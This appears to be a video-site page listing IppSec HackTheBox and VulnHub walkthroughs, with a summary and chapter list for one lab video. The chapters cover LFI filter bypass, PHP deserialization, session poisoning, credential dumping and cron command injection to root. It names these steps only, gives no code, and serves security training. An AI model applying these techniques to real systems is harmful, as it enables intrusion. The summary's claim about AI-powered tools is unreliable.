28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

This video teaches viewers how to exploit vulnerabilities in web applications using tools such as nmap, burp suite, and hashcat, and how to harden PHP web servers against such attacks. Viewers will learn about double URL encoding, static code analysis, and regular expressions to find vulnerabilities in crawled PHP files. The video also covers certificate management and cron jobs.

Key Takeaways
  1. Use nmap to enumerate versions and open ports on the target IP address
  2. Use burp suite to intercept and analyze HTTP requests and responses
  3. Exploit LFI vulnerability using double URL encoding
  4. Use hashcat to crack MD5 hashes
  5. Harden PHP web server by setting allow_url_fopen to off
  6. Use cron jobs to renew certificates
💡 The video demonstrates the importance of web application security and the need for defenders to stay up-to-date with the latest attack techniques and tools. It also highlights the use of AI-powered tools in vulnerability exploitation and defense.

Related Reads

📰
Social Discovery Group’s Announcement: A Communication That Raises Questions About Transparency and…
Social Discovery Group's announcement raises questions about transparency and cybersecurity, highlighting the importance of critical analysis in the industry
Medium · Cybersecurity
📰
Adobe Producer Spoofing: A PDF Metadata Forgery Case Study
Learn how to detect PDF metadata forgery by analyzing the Adobe Producer string and structural forensics to catch contradictions
Dev.to · Iurii Rogulia
📰
Today's the Deadline: Three Separate CISA Patch Orders Just Collided on the Same Weekend
Apply urgent CISA patches before the deadline to ensure infrastructure security
Dev.to · Fabio Baensch
📰
How Anthropic Could Have Prevented the “Claude Gift Fraud” With Security 101
Learn how Anthropic's security failures led to the Claude gift fraud and how basic security measures could have prevented it
Medium · Cybersecurity

Chapters (22)

Intro
0:51 Start of nmap
2:30 Finding some vulnerable-looking parameters
3:50 Testing some basic things for LFI, finding a WAF blocking ../. Double encodin
7:11 Start of writing a script to abuse this LFI and crawl/download all the php sou
10:30 Making the script recursive, so it will check pages downloaded for new links
16:50 Making the script save the files
19:40 Opening the code in Visual Studio Code, and showing off Snyk's static code anl
22:20 Identifying how the site generates activation codes upon registration identify
25:30 Exploiting the PHP Unserialization by finding a vulnerable gadget (wakeup) whi
27:45 Building a deserialization object to download a file off our server and write
32:08 EDIT: Talking about webserver hardening (allow_url_fopen in php) and how it wo
35:00 EDIT: Poisoning our PHP Session with PHP Code as our username, then building a
41:38 Getting a shell on the box, dumping credentials from postgres
44:55 Attempting to crack the passwords, failing, checking the source code to identi
51:25 Passwords cracked logging in as bill
55:10 Using pspy to identify a script runs to renew certificates
57:15 Going over the bash script and identifying a command injection vulnerability.
1:01:45 Failing for a bit because I didn't change the certificate time, then changed t
1:06:04 Finding the CheckEnd parameter, setting our days equal to one but our payload
1:08:15 Putting the payload in $(), and getting root to the box
1:10:20 Just making sure we fully understood why our first attempts failed
Up next
Best VPN for Mac 2026 — Top 3 Tested and Which ONE Wins
Tutorial Stack
Watch →